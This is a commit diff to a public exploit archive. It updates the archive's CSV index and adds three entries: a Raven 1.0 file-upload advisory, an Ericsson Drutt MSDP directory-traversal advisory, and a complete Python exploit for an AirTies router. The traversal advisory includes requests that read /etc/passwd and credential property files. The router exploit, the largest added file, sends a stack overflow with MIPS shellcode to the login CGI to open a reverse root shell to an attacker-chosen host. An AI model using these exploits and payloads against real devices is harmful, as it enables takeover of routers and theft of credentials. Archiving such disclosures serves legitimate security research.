pythonmaster41
diff --git a/‎files.csv‎
Lines changed: 26 additions & 5 deletions b/‎files.csv‎
Lines changed: 26 additions & 5 deletions
diff --git a/‎platforms/asp/webapps/36599.txt‎
Lines changed: 9 additions & 0 deletions b/‎platforms/asp/webapps/36599.txt‎
Lines changed: 9 additions & 0 deletions
diff --git a/‎platforms/linux/webapps/36619.txt‎
Lines changed: 39 additions & 0 deletions b/‎platforms/linux/webapps/36619.txt‎
Lines changed: 39 additions & 0 deletions
diff --git a/‎platforms/multiple/remote/36577.py‎
Lines changed: 78 additions & 0 deletions b/‎platforms/multiple/remote/36577.py‎
Lines changed: 78 additions & 0 deletions
@@ -32798,9 +32798,9 @@ id,file,description,date,author,platform,type,port
 36369,platforms/xml/webapps/36369.txt,"Citrix Netscaler NS10.5 - WAF Bypass Via HTTP Header Pollution",2015-03-12,"BGA Security",xml,webapps,0
 36370,platforms/linux/remote/36370.txt,"ArcSight Logger - Arbitrary File Upload (Code Execution)",2015-03-13,"Horoszkiewicz Julian ISP_",linux,remote,0
 36371,platforms/php/webapps/36371.txt,"Codiad 2.5.3 - LFI Vulnerability",2015-03-12,"TUNISIAN CYBER",php,webapps,0
-36372,platforms/php/webapps/36372.txt,"Wordpress Theme DesignFolio Plus 1.2 - Arbitrary File Upload Vulnerability",2015-03-04,"Crash bandicot",php,webapps,0
-36373,platforms/php/webapps/36373.txt,"Joomla Simple Photo Gallery 1.0 - Arbitrary File Upload",2015-03-10,"Crash bandicot",php,webapps,0
-36374,platforms/php/webapps/36374.txt,"Wordpress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload",2015-03-08,"Crash bandicot",php,webapps,0
+36372,platforms/php/webapps/36372.txt,"Wordpress Theme DesignFolio Plus 1.2 - Arbitrary File Upload Vulnerability",2015-03-04,CrashBandicot,php,webapps,0
+36373,platforms/php/webapps/36373.txt,"Joomla Simple Photo Gallery 1.0 - Arbitrary File Upload",2015-03-10,CrashBandicot,php,webapps,0
+36374,platforms/php/webapps/36374.txt,"Wordpress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload",2015-03-08,CrashBandicot,php,webapps,0
 36375,platforms/asp/webapps/36375.txt,"Virtual Vertex Muster 6.1.6 Web Interface Directory Traversal Vulnerability",2011-11-29,"Nick Freeman",asp,webapps,0
 36376,platforms/windows/remote/36376.txt,"Oxide WebServer Directory Traversal Vulnerability",2011-11-29,demonalex,windows,remote,0
 36377,platforms/multiple/dos/36377.txt,"CoDeSys 3.4 HTTP POST Request NULL Pointer Content-Length Parsing Remote DoS",2011-11-30,"Luigi Auriemma",multiple,dos,0
@@ -32977,9 +32977,9 @@ id,file,description,date,author,platform,type,port
 36557,platforms/windows/local/36557.txt,"HTTrack Website Copier 3.48-21 - DLL Hijacking",2015-03-30,"TUNISIAN CYBER",windows,local,0
 36558,platforms/windows/local/36558.txt,"UltraISO 9.6.2.3059 - DLL Hijacking",2015-03-30,"TUNISIAN CYBER",windows,local,0
 36559,platforms/php/webapps/36559.txt,"Wordpress aspose-doc-exporter Plugin 1.0 - Arbitrary File Download Vulnerability",2015-03-30,ACC3SS,php,webapps,0
-36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection Vulnerability",2015-03-30,"Crash bandicot",php,webapps,0
+36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0
 36561,platforms/php/webapps/36561.txt,"Joomla Contact Form Maker 1.0.1 Component - SQL injection vulnerability",2015-03-30,"TUNISIAN CYBER",php,webapps,0
-36563,platforms/php/webapps/36563.txt,"Joomla Gallery WD - SQL Injection Vulnerability",2015-03-30,"Crash bandicot",php,webapps,0
+36563,platforms/php/webapps/36563.txt,"Joomla Gallery WD - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0
 36564,platforms/linux/local/36564.txt,"Fedora 21 - setroubleshootd Local Root PoC",2015-03-30,"Sebastian Krahmer",linux,local,0
 36565,platforms/php/webapps/36565.txt,"ATutor 2.0.3 Multiple Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
 36566,platforms/php/webapps/36566.txt,"Beehive Forum 101 Multiple Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
@@ -32991,6 +32991,7 @@ id,file,description,date,author,platform,type,port
 36572,platforms/php/webapps/36572.txt,"Toner Cart 'show_series_ink.php' SQL Injection Vulnerability",2012-01-18,Lazmania61,php,webapps,0
 36573,platforms/php/webapps/36573.txt,"MMORPG Zone 'view_news.php' SQL Injection Vulnerability",2012-01-18,Lazmania61,php,webapps,0
 36574,platforms/php/webapps/36574.txt,"Freelance Zone 'show_code.php' SQL Injection Vulnerability",2012-01-18,Lazmania61,php,webapps,0
+36577,platforms/multiple/remote/36577.py,"Airties Air5650TT - Remote Stack Overflow",2015-03-31,"Batuhan Burakcin",multiple,remote,0
 36579,platforms/windows/remote/36579.rb,"Adobe Flash Player ByteArray With Workers Use After Free",2015-03-31,metasploit,windows,remote,0
 36580,platforms/windows/webapps/36580.rb,"Palo Alto Traps Server 3.1.2.1546 - Persistent XSS Vulnerability",2015-03-31,"Michael Hendrickx",windows,webapps,0
 36581,platforms/php/webapps/36581.txt,"Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities",2015-03-31,Mahendra,php,webapps,80
@@ -33007,3 +33008,23 @@ id,file,description,date,author,platform,type,port
 36592,platforms/php/webapps/36592.txt,"Joomla 'com_sanpham' Component Multiple SQL Injection Vulnerabilities",2012-01-21,the_cyber_nuxbie,php,webapps,0
 36593,platforms/php/webapps/36593.txt,"Joomla! 'com_xball' Component 'team_id' Parameter SQL Injection Vulnerability",2012-01-23,CoBRa_21,php,webapps,0
 36594,platforms/php/webapps/36594.txt,"Joomla! 'com_boss' Component 'controller' Parameter Local File Include Vulnerability",2012-01-21,the_cyber_nuxbie,php,webapps,0
+36595,platforms/php/webapps/36595.txt,"Joomla 'com_car' Component Multiple SQL Injection Vulnerabilities",2012-01-21,the_cyber_nuxbie,php,webapps,0
+36596,platforms/php/webapps/36596.txt,"Joomla! 'com_some' Component 'controller' Parameter Local File Include Vulnerability",2012-01-21,the_cyber_nuxbie,php,webapps,0
+36597,platforms/php/webapps/36597.txt,"Joomla! 'com_bulkenquery' Component 'controller' Parameter Local File Include Vulnerability",2012-01-21,the_cyber_nuxbie,php,webapps,0
+36598,platforms/php/webapps/36598.txt,"Joomla! 'com_kp' Component 'controller' Parameter Local File Include Vulnerability",2012-01-21,the_cyber_nuxbie,php,webapps,0
+36599,platforms/asp/webapps/36599.txt,"Raven 1.0 'connector.asp' Arbitrary File Upload Vulnerability",2012-01-21,HELLBOY,asp,webapps,0
+36600,platforms/php/webapps/36600.txt,"Wordpress Business Intelligence Plugin - SQL injection",2015-04-02,"Jagriti Sahu",php,webapps,80
+36601,platforms/php/webapps/36601.txt,"Joomla Spider Random Article Component - SQL Injection",2015-04-02,"Jagriti Sahu",php,webapps,80
+36602,platforms/windows/remote/36602.html,"Webgate WESP SDK 1.2 ChangePassword Stack Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
+36603,platforms/windows/remote/36603.html,"WebGate eDVR Manager 2.6.4 AudioOnlySiteChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
+36604,platforms/windows/remote/36604.html,"WebGate WinRDS 2.0.8 PlaySiteAllChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
+36606,platforms/windows/remote/36606.html,"WebGate eDVR Manager 2.6.4 SiteChannel Property Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
+36607,platforms/windows/remote/36607.html,"WebGate eDVR Manager 2.6.4 Connect Method Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
+36609,platforms/multiple/webapps/36609.txt,"Kemp Load Master 7.1.16 - Multiple Vulnerabilities",2015-04-02,"Roberto Suggi Liverani",multiple,webapps,80
+36613,platforms/php/webapps/36613.txt,"Wordpress Simple Ads Manager Plugin - Multiple SQL Injection",2015-04-02,"ITAS Team",php,webapps,80
+36614,platforms/php/webapps/36614.txt,"Wordpress Simple Ads Manager 2.5.94 - Arbitrary File Upload",2015-04-02,"ITAS Team",php,webapps,80
+36615,platforms/php/webapps/36615.txt,"Wordpress Simple Ads Manager - Information Disclosure",2015-04-02,"ITAS Team",php,webapps,80
+36616,platforms/php/webapps/36616.txt,"phpSFP - Schedule Facebook Posts 1.5.6 SQL Injection",2015-04-02,@u0x,php,webapps,80
+36617,platforms/php/webapps/36617.txt,"WordPress VideoWhisper Video Presentation 3.31.17 - Remote File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80
+36618,platforms/php/webapps/36618.txt,"VideoWhisper Video Conference Integration 4.91.8 - Remote File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80
+36619,platforms/linux/webapps/36619.txt,"Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal",2015-04-02,"Anastasios Monachos",linux,webapps,0
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51631/info
+
+Raven is prone to a vulnerability that lets an attacker upload and execute arbitrary script code in the context of the affected webserver process. The issue occurs because the application fails to sufficiently sanitize user-supplied input.
+
+Raven 1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[patch]/admin/fck2/editor/filemanager/browser/default/browser.html?Connector=connectors/asp/connector.asp&ServerPath=/forum/uploads/
+
+http://www.example.com/forum/admin/fck2/editor/filemanager/browser/default/browser.html?Connector=connectors/asp/connector.asp&ServerPath=/forum/uploads/ 
@@ -0,0 +1,39 @@
++------------------------------------------------------------------------------------------------------+
++ Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal Vulnerability and Arbitrary File Access +
++------------------------------------------------------------------------------------------------------+
+Affected Product: Ericsson Drutt MSDP (Instance Monitor)
+Vendor Homepage  : www.ericsson.com
+Version    : 4, 5 and 6 
+CVE v2 Vector  : AV:N/AC:L/Au:N/C:P/I:N/A:N
+CVE    : CVE-2015-2166
+Discovered by  : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
+Patched    : Yes
+
++-------------+
++ Description +
++-------------+
+Ericsson Drutt Mobile Service Delivery Platform (MSDP) is a complete business support system providing an SDP center for both on- and off-portal business that includes support for the retail, advertising and wholesale of a wide range of different products and services. The MSDP was originally developed by Drutt Corporation which Ericsson bought back in 2007. Drutt was converted into Ericsson SA SD&P and they are still developing the MSDP. The platform is available in three configurations which also can be combined in the same installation: Storefront, Mobile Marketing and Open Surf.
+
+The identified vulnerability affects the Instance Monitor component and allows a unauthenticated remote attacker to access arbitrary files on the file system. 
+
++----------------------+
++ Exploitation Details +
++----------------------+
+This vulnerability can be triggered via a simple, similar to the below HTTP GET request(s):
+
+  http://<drutt>:<port>/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
+  http://<drutt>:<port>/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fopt/drutt/msdp/manager/conf/props/msdp-users.properties
+  http://<drutt>:<port>/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/opt/drutt/msdp/manager/conf/ccContext.properties
+
++---------------------+
++ Disclosure Timeline +
++---------------------+
+17.Feb.2015 - Contacted Ericsson http://www.ericsson.com/feedback
+24.Feb.2015 - Ericsson responded with point of contact at Corporate Security Office
+24.Feb.2015 - Contacted Corporate Security Office team
+02.Mar.2015 - Ericsson Product Security Incident Response Team reverted via a secure channel
+02.Mar.2015 - Shared vulnerability details
+06.Mar.2015 - Ericsson confirmed the validity of the issues and started developing the patches
+08.Mar.2015 - Agreed on public disclosure timelines
+12.Mar.2015 - Patches released
+31.Mar.2015 - Public disclosure
@@ -0,0 +1,78 @@
+#!/usr/bin/env python
+#####################################################################################
+# Exploit for the AIRTIES Air5650v3TT 
+# Spawns a reverse root shell
+# Author: Batuhan Burakcin
+# Contact: batuhan@bmicrosystems.com
+# Twitter: @batuhanburakcin
+# Web: http://www.bmicrosystems.com
+#####################################################################################
+
+import sys
+import time
+import string
+import socket, struct
+import urllib, urllib2, httplib
+
+
+
+
+
+if __name__ == '__main__':
+	
+
+
+
+	try:
+		ip = sys.argv[1]
+		revhost = sys.argv[2]
+		revport = sys.argv[3]
+	except:
+		print "Usage: %s <target ip> <reverse shell ip> <reverse shell port>" % sys.argv[0]
+
+	host = struct.unpack('>L',socket.inet_aton(revhost))[0]	
+	port = string.atoi(revport)
+
+
+	shellcode = ""
+	shellcode += "\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5\xff\xfd"
+	shellcode += "\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\xaf\xa2\xff\xff"
+	shellcode += "\x8f\xa4\xff\xff\x34\x0f\xff\xfd\x01\xe0\x78\x27\xaf\xaf\xff\xe0"
+	shellcode += "\x3c\x0e" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1]
+	shellcode += "\x35\xce" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1]
+	shellcode += "\xaf\xae\xff\xe4"
+	shellcode += "\x3c\x0e" + struct.unpack('>cccc',struct.pack('>I', host))[0] + struct.unpack('>cccc',struct.pack('>I', host))[1]
+	shellcode += "\x35\xce" + struct.unpack('>cccc',struct.pack('>I', host))[2] + struct.unpack('>cccc',struct.pack('>I', host))[3]
+	shellcode += "\xaf\xae\xff\xe6\x27\xa5\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27"
+	shellcode += "\x24\x02\x10\x4a\x01\x01\x01\x0c\x24\x11\xff\xfd\x02\x20\x88\x27"
+	shellcode += "\x8f\xa4\xff\xff\x02\x20\x28\x21\x24\x02\x0f\xdf\x01\x01\x01\x0c"
+	shellcode += "\x24\x10\xff\xff\x22\x31\xff\xff\x16\x30\xff\xfa\x28\x06\xff\xff"
+	shellcode += "\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f"
+	shellcode += "\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec"
+	shellcode += "\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab"
+	shellcode += "\x01\x01\x01\x0c"
+
+
+	data = "\x41"*359 + "\x2A\xB1\x19\x18" + "\x41"*40 + "\x2A\xB1\x44\x40" 
+	data += "\x41"*12 + "\x2A\xB0\xFC\xD4" + "\x41"*16 + "\x2A\xB0\x7A\x2C" 
+	data += "\x41"*28 + "\x2A\xB0\x30\xDC" + "\x41"*240 + shellcode + "\x27\xE0\xFF\xFF"*48
+
+	pdata = {
+		'redirect'		: data,
+		'self'			: '1',
+		'user'			: 'tanri',
+		'password'		: 'ihtiyacmyok',
+		'gonder'		: 'TAMAM'
+		}
+
+	login_data = urllib.urlencode(pdata)
+	#print login_data
+
+	url = 'http://%s/cgi-bin/login' % ip
+	header = {}
+	req = urllib2.Request(url, login_data, header)
+	rsp = urllib2.urlopen(req)
+
+
+
+